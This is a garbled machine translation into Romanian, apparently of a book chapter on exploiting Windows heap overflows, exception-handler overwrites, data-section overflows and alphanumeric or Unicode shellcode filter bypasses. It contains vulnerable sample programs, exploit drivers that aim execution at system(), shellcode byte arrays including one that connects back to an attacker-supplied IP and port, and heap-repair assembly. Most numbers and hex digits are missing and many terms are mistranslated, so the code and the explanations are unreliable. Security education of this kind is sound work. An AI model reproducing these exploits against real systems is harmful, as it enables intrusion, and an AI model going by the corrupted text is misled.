Următorul liber bloc Kromv| A merge, Două indicator, conținând verso link-uri pe matrice lista liberă, in miscare sunt în sfarsit dedicat bloc La toata lumea alocare sau eliberează memorie indicatoare sunt actualizate Asa de modul în care dedicat blocuri uni-' sunt în dublu conectat listă Când în rezultat revărsare tampon, situat în morman, merge mai departe suprascrierea oficial date, înlocuire aceste indicatoare permite scrie în memorie arbitrar dubla cuvânt; atac poate Schimbare date programe (în volum inclusiv și indicatoare pe funcții) Atac înlocuiește acestea date, care Cu cel mai mare probabilitate permite către el a primi Control de mai sus aplicarea De exemplu, dacă el voi inlocui indicator pe funcţie indicator pe A mea tampon, dar față provocare funcții întâmpla încălcare acces, mai repede Total, atentat, încercare interceptare management va lua sfarsit eșec LA astfel de cazuri atacator mai bine a inlocui indicator pe manipulator excepții — în acest caz la încălcare acces va fi efectuat Codul atacator Dar inainte de Cum descoperi Cum pe Verifica revărsare tampon îndeplini arbitrar Codul, hai sa mai bine hai să ne dăm seama în ce se întâmplă Următorul program vulnerabil în relație revărsare grămezi: #include #include DWORD MyExceptionHandler(void) int foo(char *buf) int malndnt argc char *argv[]) ( HMODULE = LoadLibraryC'msvcrt dll") = LoadL brary("netapi dll") printf("\n\nHeapoverflow program \n"): dacă (argc != ) întoarcere printfC'ARGS!"), foo(argv[l]): întoarcere } DWORD MyExceptionHandler(void) printfCIn excepție manipulator ") exitProcess(l) întoarcere } int foo(char *buf) HLOCAL hl = h = MÂNER hp încerca{ hp = HeapCreate( , x , x ) f('CP) Poropolіoіііio tampon în morman întoarcere printf("Eșuat Iată crea morman \n"), hl = HeapAlloc(hp,HEAP ZERO MEMORY, ): printf("HEAP: L X % X\n" ,hl,&hl); // Aici merge mai departe revărsare tampon: strcpy(hl,buf): // Control interceptat la al doilea apel HeapAl IOCO h = HeapAlloc(hp,HEAP ZERO MEMORY, ) printfC'hello"): except(MyExceptionHandler()) printf("hopa ") întoarcere : eu NOTĂ - - - Pentru primind optim rezultate program ar trebui să compila n Microsoft Vizual C++ din comanda linii Următorul cale: ( eu /TS grămada с Vulnerabilitate în acest program creată provocare strcpy() în funcții foo() Dacă dchipa linii buf va depăşi octet (marimea recepţioner tampon), întâmpla suprascrierea managerii structurilor grămezi administrator structura conţine l nici indicator, referindu-se pe matrice lista liberă, în care este pereche indicaţie ii pa Următorul liber bloc La eliberare sau alocare memorie-ip dispecer grămezi schimbări lor locuri Presupune program transmise prea mult lung argument, de exemplu, o sută momeală Mai departe acest argument transmise funcții prost, Unde și merge mai departe re- iknpiepie La al doilea apel NearAPos() merge mai departe încălcare acces: //I F mov dword ptr [ecx],eax // mov dword ptr [eax+ ],ecx \"nya încălcare merge mai departe la al doilea apel HeapAtloc(), apel HeapFree() ipp HeapRealLloc() LED ar la subiecte la fel consecințe Dacă vedere conţinut- mimos registre ESC și EAH, tu vei vedea ce ambii Inregistreaza-te conține date din i iroki, transferat program în calitate argument Noi înlocuit indicatoare și ( bărbătesc structura management morman, asa de la Actualizați date ii chgdegvie al doilea apel NearAPos() ambii Inregistreaza-te a se dovedi sub al nostru i opirol Acum sa vedem, ce merge mai departe în program iunie dword ptr [ecx],eax În i'kchine, stocate în Inregistreaza-te EAH, mișcări pe abordare, pe care uka-іvagg ESH ȘI aceasta este mijloace ce noi Poate sa a inlocui pic pe oricine abordare inriua/iyugo vizate spaţiu aplicatii (disponibil pentru înregistrări) •Iulie sens pe al nostru alegere In orice caz, Aici mânca unu subtilitate Uite -i //include nesemnat int GetAddresschar *lib, char *functie) gol fixupdresses(char *tmp, nesemnat int X), In EU principalO ( nesemnat char buffer[ ]="", nesemnat char heap[ ]="" nesemnat char pebf[ ]="" nesemnat char shellcode[ ]="", nesemnat int adresa sistemului = nesemnat int adresa de RtlEnterCriticalSection = nesemnat char tmp[ ]="" nesemnat int ent = printf("Se primesc adrese \n") adresa sistemului = GetAddressC'msvcrt dll","sistem") adresa de Rt EnterCriti calSecti pe = GetAddress("ntdl dl " "RtlEnterCri Secțiunea tică"), if(adresa sistemului == || adresă a RtlEnterCriticalSection == ) întoarcere printf("Eșuat la obține adrese\n"), printf("Adresa de msvert sistem\t\t\t= % X\n",adresa sistemului) printf("Adresa de ntdll RtlEnterCriticalSection\t = % X\n",address of RtlEnterCri Secțiunea tică), strcpy(buffer "heap] ") Capitol Revărsare în Windows // Introdus Codul - reface HOHOTE și cauze systemcalc"), strcat(buffer,”\”\x \x \x \x \x \x \x \x A\x \x \x \x B\x \xB ” ): fixupdresses(tmp address of RtlEnterCriti calSecti pe): strcat(buffer tmp); strcat(buffer "\x \x \x \x \xC \x \x \x \x \x C\x \x \x B\x \x \xB nouă") fixupdresses(tmp address of system); strcat(buffer tmp); strcat(buffer,"\xFF\xDl"): // Substituenți wh e(cnt > Exploatare vulnerabilități la revărsare grămezi tmp[ ] = A, A = X, A = A » ; bprgz] = A; eu pda menționat anterior, în Windows Server aceste indicatoare nu sunt utilizate Ііо/іе A merge, în HOHOTE Windows Server aceste adrese sunt resetate In orice caz, posibilitate deținere asemănătoare atacuri Toata lumea la fel este salvat Apel ExitProcess() Pip LJnhandledExceptionFilter() Oportunitati la apel numeroase funcții Ldr* (ilkph, Cum LdrUnloadDll()) niste funcții Ldr* cauză funcţie pe Evidențiat, dacă el excelent din zero De obicei valorile aceste indicatoare pe funcții predare la intervenţie mecanism SHIM Pentru normal proceselor aceste indicatoare rămâne zero Întrebând lor valorile prin revărsare, poate sa obține asemănătoare efect Rescriere indicator pe primul vector manipulator pe abordare FC Secol muntos tratament excepții primul a apărut în Windows XP LA excelent chig despre G tradiţional stivuibile prelucrare, la care structurilor înregistrare în la / mustrări stocate în grămadă, la vector prelucrare inteligenţă despre procesoare stocate în morman Structura, în care stocate informație, foarte asemănătoare Pe structura EXCEPTION REGISTRATION slruct VECTORED EXCEPTION NODE dword m pNextNode, dword m pPreviousNode PVOID m pfnVectoredHandler, l Camp m pNextNode indica pe Următorul structura VECTORED EXCEPTION NODUL, camp m pPreviousNode — pe anterior structura VECTORED EXCEPTION NODUL, A m pfnVectoredHandler — pe adresa cod implementare manipulator Decretul-i Cu /ii" pa primul vector nodul manipulator, aplicat la apariția ik la / reverenta, este pe abordare x FC (cu toate că acest adresa poate Schimbare-( și G modificare sisteme actualizări Serviciu Rusk) Pe Verifica revărsare la uh ii acest indicator este înlocuit indicator pe al nostru proprii pseudostructură virv VECTORATE-EXCEPȚIE La beneficii astfel de abordare poate sa atribuite apoi, •dar vector manipulatorii excepții sunt numite mai devreme grămadă # include nesemnat int GetAddress(car *lib char *functie) gol fixupdresses(char *tmp, nesemnat int X), int principal() nesemnat char buffer[ ]="" nesemnat char grămada[ >"", nesemnat char pebf[ ]="" nesemnat char shellcode[ >"" nesemnat int adresa sistemului = nesemnat char ^p[ ]="" nesemnat int ent = printf("Getlng abordare de sistem \n"), adresa sistemului - GetAddressC'msvcrt dll" "sistem"), if(adresa sistemului == ) întoarcere prmtfC'Eșuat la obține abordare \n") printf("Adresa de msvert sistem\t\t\t= % X\n" adresă de sistem) strcpy(buffer,"heapl ”) Exploatare vulnerabilități la revărsare grămezi în timp ce (cnt i responsabil pe prelucrare excepții din biblioteci ntdlLdll LA Windows XP funcţie KillserExceptionDispatcher() primul cauze Toata lumea vector manipulatori, apoi stivuibile manipulatori, și in cele din urma, filtru brut excepții LA Windows merge mai departe practic apoi la fel, dacă nu gândi, ce i și și i excitat manipulatorii nu sunt numite in orice caz la în curs de dezvoltare exploata revărsare grămezi apare unu problemă: dacă vulnerabil proces depanare, filtru brut excepții în general nu nu numit nou superior grad neplăcut, când întregul Codul exploata bazat pe utilizare > vai iii acest filtru Tem nu Mai puțin, la Probleme exista decizie Funcţie KiUserExceptionDispatcher() cauze funcţie UnhandledExceptionFilter(), nnoraya controale, fiind reglată dacă proces și ar trebui să dacă apel filyr nu Capitol Revărsare în Windows prelucrate excepții Funcţie UnhandledExceptionFilter() cauze funcţie nuclee NT/ZwQueryInformationProcess, care atribuie variabil în grămadă sens OxFFFFFFFF pentru depanat proces La fel de numai NT/ZwQueryInformationProcess se intoarce Control, variabil comparat Cu pus la zero Inregistreaza-te Dacă valorile se potrivesc, numit filtru brut excepții A dacă diferă — filtru nu se numește Prin urmare, dacă tu vreau să apel filtru brut excepții în progres depanare, instalare punct întrerupe în pozitii comparatii La realizarea puncte întrerupe a inlocui sens variabil Cu OxFFFFFFFF pe x și relua proces LA acest caz filtru brut întrerupe va fi cu succes numit LA Următorul listare dat corespunzător fragment cod Netratată- ExceptionFilter() pentru Windows XP Serviciu Rusk Instalare punct întrerupe pe abordare x E B și Aștepta, pa întâmpla excepție și va fi cauzat funcţie După progres puncte întrerupe scrie în [EBP- h] sens x E F Iea E F Apăsaţi E F Apăsaţi E FB caii eax, [ebp- h] eax E E B E E B sau eax, OFFh E E BC ret E Apăsaţi E caii eax dword ptr ds : [ E AH] F mov F A mov F F caii eax, Ah edx, FFE h edx FFE mov FFE sysenter FFE ret edx, în special F ret h E Test Е jl E B cmp E E jne E mov E cmp E B je E D Apăsaţi E E caii E D mov E DF mov E E Test E E je eax, eax E dword ptr [ebp- h], esi E D eax, [ ED B ] eax, esi E edi eax eax, fs • [ ] eax, dword ptr [eax+ h] octet ptr [eax+ h],l E Dacă variabil [EURO + h] este egal cu x , actual sens esi, va fi numit filtru neterminat întrerupe A Comutare în modul nuclee Dacă sens ESI nu egală [EURO - h], merge pe abordare x E D UnhandledExceptionFilter pe XP SP La demonstra aplicarea filtru brut pskey ii în exploata revărsare grămezi, primul necesar pune deoparte n i vulnerabil la Exploatare vulnerabilități la revărsare grămezi i rame manipulator excepții Dacă excepție va fi prelucrat, inainte de filtru caz în general nu vom ajunge: //include #inel ude int foo(char *buf) int malndnt argc, char *argv[]) HMODULE , = ÎncărcareL IbraryC'msvcrt dll"), = LoadL brary("netapi dll"), printf("\n\nHeapoverflow program \n") f(argc != ) întoarcere prlntfC'ARGS!"); foo(argv[l]): întoarcere } int foo(char *buf) HLOCAL hl = h = MÂNER hp, hp = HeapCreate( xl xl ), f(!hp) întoarcere printf("Eșuat la crea morman \n"), hl = HeapAlloc(hp HEAP ZERO MEMORY, ) printf("HEAP % X % X\n",hl,&hl), // Revărsare grămezi: strcpy(hl,buf), // Control copleşit la al doilea apel HeapAl IOCO h = HeapAlloc(hp,HEAP ZERO MEMORY, ): prlntfC'salut") întoarcere Mai departe dat Codul exploata Structura management buchet este înlocuit cuplu indicii: Ox ED B (filtru brut excepții) și x C BBAD (adresa biblioteci netapi dll, conținând comanda apel dword ptr [edi+ x ]) La //include nesemnat ml GetAddress(car *lib char *functie), viiid Iixupdresses(char *tmp, nesemnat int X) Capitol Revărsare în Windows { nesemnat char buffer[ ]="", nesemnat char heap[ ]=""; nesemnat char pebf[ ]=""; nesemnat char shellcode[ ]=""; nesemnat int adresa sistemului = ; nesemnat char tmp[ ]=""; nesemnat int A = ; int cnt = ; prlntfC'Gettlng abordare de sistem \n"); adresa sistemului = GetAddress("msvcrt dll" "sistem") f(adresa sistemului == ) întoarcere printf("Fal ed la obține adresa \n"), printf("Adresa de msvcrt sistem\t\t\t= G H\n" ,adresa sistemului) strcpy(buffer "heapl "): wh e(cnt zero inain() Capitol Revărsare în Windows asm{ mov eh, dword ptr fs:[ x ] Apăsaţi eax printf("TEB: % X\n"); asm{ adăuga esp } întoarcere , } La completare curgere ocupat lor spaţiu eliberat, și liber bloc iese în evidență Următorul curgere Dacă presupune ce în primul curgere (Cu abordare bloc TEV x FFDE ) apărea problemă revărsare grămezi, apoi indicator pe primul structura înregistrare excepții va fi fi pe abordare x FFDE Revărsare grămezi permite a inlocui acest indicator indicator pe al nostru pseudostructură; desigur după acest întâmpla încălcare acces și excepție, A informație despre efectuate manipulator va fi fi sub al nostru Control Pe practică — și mai ales în caz multifile servere — exploatare acest vulnerabilități niste dificil din cauza absenta informație despre exacte unde bloc TEV actual curgere In orice caz, acest opțiune ideal se potrivește pentru cu un singur fir programe (astfel de Cum executabil fișiere pe baza CGI) Recuperare grămezi Mai repede Total, deteriorat în rezultat revărsare buchet Trebuie să restabili Dacă acest nu do, apoi Cu probabilitate , % întâmpla încălcare acces — și Mai mult mai probabil dacă vorbire merge despre tăcut morman proces Desigur, poate sa a încerca a analiza logică vulnerabil aplicatii, exact defini marimea tampon și marimea Următorul dedicat bloc, și t etc , A după întoarcere pe loc prescris valorile in orice caz performanţă toate aceste acțiune pentru fiecare specific vulnerabilități cere prea mult mare eforturi Mai bine căutare generalizat metodă recuperare grămezi Cel mai de încredere decizie — întoarcere grămezi în primordială condiție Tine minte: în numai ce creată morman (față evidenţierea blocuri) în Freel ist[O] (APROAPE BAZĂ+ xl ) sunt Două indicator pe primul liber bloc (HEAP BASE+ x ), A Două indicator în primul liber bloc indica pe FreeList[O] Noi Poate sa Schimbare indicatoare FreeListfo] Asa de, la ei indicat pa sfarsit al nostru bloc; în rezultat Toata lumea va fi tu broască Asa de, ca primul liber bloc este pe al nostru tampon Cu exceptia A merge, noi Traduceți Două indicator în Sfârşit tampon pe FreeListfo] și do Mai mult cuplu de lucruri Următorul asamblator Codul reface buchet după distrugere bloc în tăcut morman proces, Complet a lui Cum poate sa mai devreme, la împiedica încălcare dosiupa La fel recomandat a se intoarce în iniţială condiție snsiemu prelucrare nu cheie, la încălcare dosiuia ns LED la zatsііk / nіnaіііііyu Exploatare vulnerabilități la revărsare grămezi // Control numai ce a fost transferat în tampon // în rezultat apel caii dword ptr[editare+ ] Prin urmare, // oto sens este indicator pe structura management // buchet Post a lui în edx, Asa de Cum ne o sa ai nevoie // scrie valorile niste câmpuri mov edx, dword ptr[edi+ ] // LA sistem Windows ar trebui să utilizare comanda // mov edx, dword ptrfesi+ x C] // aduceți în grămadă x Apăsaţi x // și extrage în EVH pop ebx // A primi indicator pe bloc TEV // pe abordare fs [optsprezece] mov eh, dword ptr fs:[ebx] // A primi indicator pe bloc HOHOTE din TEV mov eh, dword ptr[eax-r x ] // A primi indicator pe tăcut buchet proces din REV mov eh, dword ptr[eax+ x! ] // LA eax stocate indicator pe buchet - // adresa în formă Ohhhhhhhhhhhhhhhhhhhhhhhhhh Regla indicator // la el Evidențiat pe dubla cuvânt // TotalFreeSiXe în structura grămezi adăuga al, x // Post CUVÂNT din TotalFreeSize în si mov si, cuvânt ptr[eax] // Și scrie în structura management buchet mov cuvânt ptr[edx],si // Regla edx pe inc edx inc edx // Cere marimea anterior bloc egal mov octet ptrLedx], x inc edx // resetare următoarele Două octeți mov si, cuvânt ptr[edx] xor cuvânt ptr[edx],si inc edx inc edx // Cere steaguri x mov octet ptr[edx], x inc edx // resetare următoarele Două octeți mov si, cuvânt ptr[edx] xor cuvânt ptr[edx],si mc edx mc edx ( regla oeiister ea/ Atingere la el Evidențiat pe heap oase-^ xl /, LA cel moment el conţine heap base+ x adăuga topor, x i'egitr eax indica pe lista liberă[ ] '/ Іoper scrie edx în GreeList[ ] Eitpc mov dword ptr[eax],edx // și iapisai) edx în freelistl ] Clipi mov dword ptr| o >/і i iei i și eu 'i niiiig în loii Alte Opțiuni revărsare i i ruktura, poate sa permite intrare în rădăcină catalog După acest atac-ishni primeste posibilitate sarcină date pe server web și scroafă haos niste cuvinte în completare Noi considerată niste Opțiuni exploatare vulnerabilitati, legate de i revărsare grămezi La fel de regulă mai bine Total scrie Codul exploata băutură cântând grămezi pentru fiecare specific vulnerabilități Fiecare revărsare puțin oi un sperante din un alt și circumstante, simplificând exploatare vulnerabil-i ii în unu caz, Mai apel dificultăți în prieten Noi speram ne a reușit spectacol Pericol, legate de Cu neglijent folosind grămezi Dacă nu gândi despre volum, ce tu do, posibil cel mai neplăcut efecte — Asa de chiu fi atent Alte Opțiuni revărsare II acest secțiune considerată acestea Opțiuni revărsare, care este interzis din-іП'сгіі nici la grămadă, nici la morman Revărsare secțiuni date Program este împărțit pe părți, numit secțiuni Program Codul magazine -i P în secțiuni text; secțiune date, printre alte lucruri conţine global variabile Pentru primind informație despre secțiuni în fişier imagine folosit uti-'iiiia diimpbin Cu cheie /ANTETURI; adiţional informație despre specific i'ktspi poate sa a primi prin cheie /SECȚIUNE: (lumpbln /SECȚIUNE nume secțiune Revărsare secțiuni date se intalneste mult mai rar Cum revărsare grămadă II/II grămezi; și Toata lumea la fel astfel de revărsare în Windows poate folosit la pică, cu toate că și legate de Cu serios dificultăți Pentru vizibilitate considera i călător cod C: //include //include nesemnat char buffer[ ]="" eu ARPROC mprintf = eu ARPROC mstrcpy = iul mendnt argc, char *argv[]) eu HMODULE = = LoadLibrarydmsvcrt dll"), dacă ( ) întoarcere mprintf = GetProcAddressd „printf”) i f( mprintf) întoarcere mstrcpy = GetProcAddressd „strepy”) iI( mstrcpy) fel iunie () G lavă Revărsare în Windows (mstrcpy)(buffer,argv[l]): asm{ adăuga esp } (mprintf)('ls" buffer) asm{ adăuga esp } FreeLibraryd); întoarcere } Dacă compila și alerga acest program, ea va produce dinamic Se încarcă biblioteci DIN timp împlinire (msvcrt dll) și o sa primeasca adrese funcții strcpy() și printf() variabile, în care stocate aceste adrese, a anunţat la nivel global, asa de ei sunt în secțiuni date La fel a plati Atenţie pe global definiție de octeți tampon Indicatori pe funcții sunt utilizate pentru copierea date în tampon și ieșire conţinut tampon pe consolă Verifica Ordin reclame global variabile: primul a anunţat tampon, A după Două indicator pe funcții Exact în astfel de bine date voi fi plasat în secțiuni date — primul Două indicator pe functii, apoi — tampon LA caz revărsare tampon indicatoare pe funcții voi înlocuit A la ulterior circulaţie pe -l (apoi mânca încercând apel functii) atac va fi capabil direct proces pe necesar cale La lansare programe co prea mult lung argument merge mai departe urma; actual: primul argument copiat în tampon Cu folosind indicator pe funcţie strcpy merge mai departe revărsare tampon Cu înlocuire ambii indicatoare pe funcții Mai departe Control transmise cod, pe loc pe cine trebuie sa a fost ar fi funcţie printf, și atac interceptări Control Desigur, față tu extrem simplificat programul C scris exclusiv în demonstrație scopuri Pe practică Toata lumea mult mai dificil LA real program înlocuit indicator pe funcţie poate a fi numit mult mai tarziu — la la asta timp din cauza repetate înregistrări în tampon personalizat Codul poate a fi sters Aici De ce anterior spus despre dificultăți — ei conectat Cu alegere moment LA acest program la apel funcții printf Inregistreaza-te EAH indica pe start tampon, asa de noi Poate sa pur şi simplu a inlocui indicator pe funcţie abordare, pe la care este comanda jmp eax sau caii ex Mai mult A merge, deoarece tampon transmise în calitate parametru funcții printf, noi Poate sa a primi legătură pe -l pe abordare ESP+ ȘI Hei mijloace ce indicator pe funcţie printf la fel poate sa a fost ar a inlocui abordare bloc comenzi pop reg/pop regret După Două comenzi pop în Inregistreaza-te ESP va fi adresa al nostru tampon, A comanda ret va da Control în start y(|)era Și Toata lumea la fel vă rugăm să rețineți ce pa practică astfel de simplificat situatii întâlni rar Toate farmec revărsare secțiuni date include în volum, ce Locație tampon mereu ramane fix, asa de noi Poate sa a inlocui indicator pe funcţie fix și th adrssom Revărsare blocuri TEV și HOHOTE Pentru completitudine tablouri cheltuieli la fel spune despre oportunități revărsare în bloc mediu inconjurator curgere (TEV), hoia de încredere evpdeіe/іеі în despre a lui practică chsskom aplicarea pa ne întâlnit LA toata lumea bpoke GI LA pmseіsya tampon Revărsare tampon și neexecutabil stive sch folosit pentru transformări linii ASCII în linii Unicode Cu Ajutor iiiikph functii, Cum SetComputerNameA și GetModuleHandleA Dacă presupune h io funcţie evidențiază tampon fără verificări lungime linii sau a ei a reușit introduce și fosta/judecata relativ real lungime linii ANSI aceasta este poate adus în la revărsare tampon Dacă aceasta este se va întâmpla Cum utilizare cel o abordare pentru împlinire arbitrar cod? aceasta depinde din A merge, în ce exact bloc TEV a avut loc revărsare Dacă aceasta este bloc TEV primul software curgere, apoi aglomerat date va cadea în bloc mediu inconjurator proces (REV) La fel de deja remarcat bloc HOHOTE conţine niste indicatoare, în de/folosit la completare proces Noi Poate sa a inlocui orice din aceste Evidențiat geluri și intercepta Control Dacă bloc TEV aparține nu primul, și la care un alt curgere, apoi la revărsare date suprascrie un alt (peok TEV Iniokp TEV conține niste interesant indicatoare, care poate sa a fost ml foo(char *); irit malndnt arge char *argv[]) eu nesemnat char buffer[ ]="" dacă (argc != ) întoarcere printfC'Vă rog livra un argument \n"), foo(argv[l]), întoarcere eu ml foo(char *wput) eu nesemnat char bufferL ]="M printfo X\n" ,&tampon), strcpy(buffer input) întoarcere , ) II funcții foo() apărea termeni pentru revărsare tampon în grămadă Apel * la RU() utilizări de octeți tampon fără preliminar verificări lungime si # include nesemnat char exploata[ ]= „\x \x B\xEC\xEB\x \x B\xEB\x \xE \xF \xFF\xFF\xFF\xBE\xFF\xFF” „\xFF\xFF\x \xF \xDC\xFE\xFF\xFF\x \xDE\x \xC \x \x \x \x ” Ax \x \x \x \x \x \xFF\xD \x \x \x \x \x \x \x \x C" „\x \x \x \x \x C\x F\x \x \x \xFF\x \xFC\xFF\x \xF \x ” ”\x \xF \x \xC \x \x \xC \x D\x \xC \xBl\x E\xB \xFF\x \xl h „\x \xEB\x \xE \xF \x \x \xFF\x \xFC\xFF\x \xF \x \x \xEC” „\x \xC \xlO\x \xFF\x \xFC\xFF\x \xF \x \x \xE \x \xC \xOC” „\x \xFF\x \xF \x \x \xF \x \xC \x C\x \x \xFF\x \xF \x ” ,,\x \xE \x \xC \x C\x \xFF\x \xF \xFF\x \xF \x \x \xE \x " „\xC \xOC\x \xFF\x \xF \xFF\x \xF \x \x \xDC\x \xC \xO \x ” Ax D\xD \x \xD \x \x \xC \x \x \x \xFF\x \xE \x \xC \x " „\xC \x \xB \x \x \x \xE \xFD\x \x \xD \x \x \xD \xBF\x A” „\x \x \x \x \x D\xCC\x \x \x \x \xC \x \xB \xFF\xFF\x ” „\x \xFF\xCA\x \x \x \xCA\x A\x \x A\x \xFF\x \xF \x \x ” „\xE \x A\xl \x D\x \xC \x \x B\x D\xE \x \xFF\x \xDC\x \xC ” „\x \x \x \x \xFF\xFF\xFF\x \xC \x E\x \xC \x E\x \x \x ” „\x \x D\x \x \x D\x \x \x D\x \x D\xBD\x \xFF\xFF\xFF\x ” „\x D\xBD\x \xFF\xFF\xFF\x \x \xC \x \x \x \x \xC \x \x ” „\x \xE \x \x \x \x B\x D\xD \x \x \xFF\x \xEC\xFF\x \xE ” „\x \x \xD \x \xC \x \x \x B\x \x B\x \x C\x B\x \xlC\xAD” Ax B\x \x \x \x B\xC \x B\xF \x B\xDA\x B\xCA\x \x \x C\x H „\x \x \x \x \xlC\x ]\x A\xlF\x \x \x \x \x \x \x \x " „\x \x A\x \x B\xFA\x \x E\x \x F\x \x \x \x \x \x \x ” AxC \xO \x \xCi\xO \xEB\xEC\x \xC \xO \x \x F\x \x F\x \x r' „\x \x \x \xC \x \x \xCl\x \xEB\xD \x B\xFA\x F\xB \x \x ” „\x C\x \x \x C\x \x \x B\x CAx \x \x C\x \x C\x F\x \x ” „\x \x \x \xBC\x \x A\x E\x B\x A\xAF\x D\x \x C\x A\x C\x C” „\xBE\xFF\xFF\xBA\x \x \x B\xAB\x \x D\x A\x E\x B\xFF\xFF\xA ” „\x C\xCD\xA \xCC\xCD\xDl\x B\x \x \xFF\xFF\>A \xAC\xBE\xAC\x B” „\x E\x D\x B\x A\x F\xFF\xFF \ X A \xAC\xB E\xAC\x \x C\x \x A\x LA" „\xBE\xFF\xFF\x C\x \x \x \x A\x Dx B\xFF\x C\x \x B\xFF\xFF” „\xFF\xFF\xFF\xFF” int iraw (înL argc, char *argv[]) int cnt uri*, clătită char bu eu f cri eu eu Revărsare tampon și inexprimabil stive f(argc != ) întoarcere O, StartW nsock() // Cere adresa IP și port în implementate cod // Dacă adresa IP conţine NUL linia va fi trunchiată SetUpExplby t(argvC ] atoi(argv[ ])), // Nume vulnerabil programe strcpy(buffer,"nes "); // copierea cod în tampon strcat(buffer exploit) // Înregistrare substituenți în tampon în timp ce (cnt s folosit pentru suprascrierea salvat adrese întoarcere sau indicator pe funcţie Format acest valorile ar trebui să a fi permis filtru La ra-іѵmpykh cerințe filtre (de exemplu, tipărite ASCII- sau Unicode- sim nols) primul problemă de obicei a reusi rezolva Decizie al doilea Probleme i niіsit din perseverenţă inventivitate și în anumit grad din ve- KCHIII Codul ocolire alfanumerice filtre II Recent trecut de multe ori întâlnit situatii în care Codul exploata /carte a fost constau din tipărite caractere ASCII; in caz contrar zicală fiecare octet ar trebui să a fost minciună în gamă A-Z ( x - x A), az ( x - x A) sau - ( x - x ) Introdus Codul astfel de drăguț primul a fost descris Riley "Cezar" Eller (Riley Cezar Eller în articol Ocolind MSB Date Filtre pentru Uni fer revărsări» (August G ) Cu toate că în articol Eller admisibilă considera- int principalO { char buffer[ ]="aaaaaaaaj X HPZRXf A f UVfPh z X JEaBP" „YAAAAAAQhC X C wvH wPh a X MqPh ” „ CCXf wfPRXf zzf EefPh M X aqH uPh G ” „OX ZgnH PRX MOOPYAQX aHHfPRX O” „ PRXf zf bPYAAAAAAfQRXf zf oPYAAAfQ” „RX z ZZZnPAAAAAAAAAAAAAAAAAAAAAAA” "AAAAAAAAAAAAAAAAAAAAAAAAAEBEBEBEBEBE" „BEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBQQ”; nesemnat int X = ; X = &tampon; asm{ mov în special x jmp esp } întoarcere ; } Codul real exploata, care necesar a executa, criptat și a suge înghiţituri la acest fragment semn a lui completare este simbol) Mai mult R Mai departe este dată Codul criptare: #include #include int principalO { nesemnat char RealShel -code[]="\x \x B\xEC\x \x \x \x \x \x \x B\xE \x D\xC " nesemnat int numara , lungime= cnt= , nesemnat char *ptr = nuli, nesemnat char a= , b= , lungime - strlen(RealShellCode) ptr - malloc((lungime + ) * ) Codul ocolire Filtre Unicode ptr = malloc((lungime + ) * ) dacă(!ptr) întoarcere printfCmallocO căzutAn") ZeroMemory(ptr ( lungime+ )* ); în timp ce (număr orfan anumit structura: fiecare al doilea octet ar trebui să a fi egală bine, când Cum odihnă octeți trebuie sa a fi excelent din zero Desigur și ii ngm eliminarea ramane foarte limitat trusa comenzi — în Mai ales o/i octet cu octet operațiuni, în volum inclusiv Apăsaţi, pop, inc și dec La fel disponibil G• im ііі'іy drăguț Z/OO/?/?/?, de exemplu: inul (mu dword Dlih'dxl OxOOnn Capitol nouă Bypass filtre La fel uneori a reusi utilizare comenzi drăguț nnQQnnQQnn: imul eh, dword ptr[eax] OxOOnnOOnn Dacă Două un singur octet comenzi urma prieten pe prieten, Cum în Următorul pr| cel mai puţin apoi pentru turnate la "format Unicode" lor necesar divide por-ee vii Cu performanţă OOPPOO: de apăsare eax pop esx unu din posibil Opțiuni: D adăuga octet ptr [ebp], cap Desigur, la astfel de cale a lucrat, adresa, pe care se referă EURO, dL neveste a fi disponibil pentru înregistrări Dacă aceasta este condiție nu efectuat, alege^ un alt comanda din acestea, ce prezentat mai tarziu în prezent secțiune veneţian metodă Scrie deplin program la astfel de limitat a stabilit echipă extrem dificil Este interzis dacă simplifica acest sarcină? Poate sa utilizare] limitat a stabilit comenzi pentru formare cod "real" exploata ta, Cum aceasta este făcut în veneţian metodă descris în articol Chris Anli GW esență în veneţian metodă sunt utilizate modul înregistrări exploata și bufet || conținând jumătate înregistrate exploata Tampon este subiecte recepţie com, în care în final cont ar trebui să se dovedesc a fi "real" exploata Ma bot înregistrări, constând numai din comenzi limitat a stabilit, înlocuiește fiecare nul octet în recepţioner tampon valoare, necesar pentru format^ complet, "lucru" cod exploata Considera exemplu Față start muncă modul înregistrări adoptiv bufo| poate conține următoarele date: \x \x \x \x \x \x \x \x LA din timp a lui muncă modul înregistrări înlocuiește primul nul octet kodots x ; nou conţinut tampon arata Asa de: \x \x \x \x \x \x \x \x ' Apoi Următorul nul octet este înlocuit cod x : \x \x \x \x \x \x \x \x Proces se repetă inainte de acestea de cand, pa în tampon nu va fi format Codul "pa permanent" exploata: \x \x \x \x \x \x \x \x Ce se întâmplă aminteste treptat închidere veneţian jaluzele - de aici și titlu metodă La a inlocui zero octeți necesar valorile modul înregistrări o sa ai nevoie Cum minim unu Inregistreaza-te, arătând pe primul glonţ octet jumătate umplut tampon Dacă presupune ce EAH indica pe primul nul octet, a lui sens poate a fi dat Următorul comanda: adăuga bvte nt r Geakhi d h veneţian metodă În al treilea rând, ce plus x la x dă x După acest Inregistreaza-te EAH de două ori incrementat pentru tranziție la Următorul zero octet; după acest nici de asemenea poate a fi umplut Dar nu cheltuieli a uita, ce modul înregistrări dol-zhі'іі conține comenzi "în format Unicode", asa de comenzi trebuie sa a fi dnііo/nkchіy echivalente nop Înregistrare unu octeți cod implementate Următorul fragment: ( ' OO- D adăuga adăuga octet ptr [eax] h octet ptr [ebp], cap (II S inc eax ( - D adăuga octet ptr [ebp], cap OOI inc eax D adăuga octet ptr [ebp] ch |І da noi avem paisprezece octet comenzi ( larg personaje) și octeți memorie ( lățimi și ii simbol); se dovedește, ce pentru reprezentare octet real cod is-Pіpіzuіotsya şaisprezece octet ( larg personaje) unu octet deja este în recepţioner tampon, A al doilea creată modul înregistrări Codul Chris (relativ) compact, ce este demnitate, dar problemă II ceva, ce unu din octeți cod egală x Dacă Codul primul transmise în formă șiruri ASCII A apoi convertit în codificare Unicode vulnerabil proces-i i înregistrări, necesar cere condiție niste registre Inregistreaza-te ESC tsu'K'i indica pe primul nul octet recepţioner tampon, pe top grămadă n»'i/ichііo fi sens x , în Inregistreaza-te EDX (mai precis — în DL) — sens ii SCH ( eliberare , articol www phrack org/show php?p= &a= • „ ida Cod roșu Vierme analiză" (Ryan permeh, Marc Maiffret) www eeye com/html/Research/Advisories/AL htmL Arhive De mai jos enumerate arhive util articole LA lor întâlni link-uri pe mulți din menționat articole, A la fel pe alte util textele despre http://julianor tripod com/bufo html; despre http://packetstormsecurity nl/papers/unix/; despre www lsd-pl net/papers 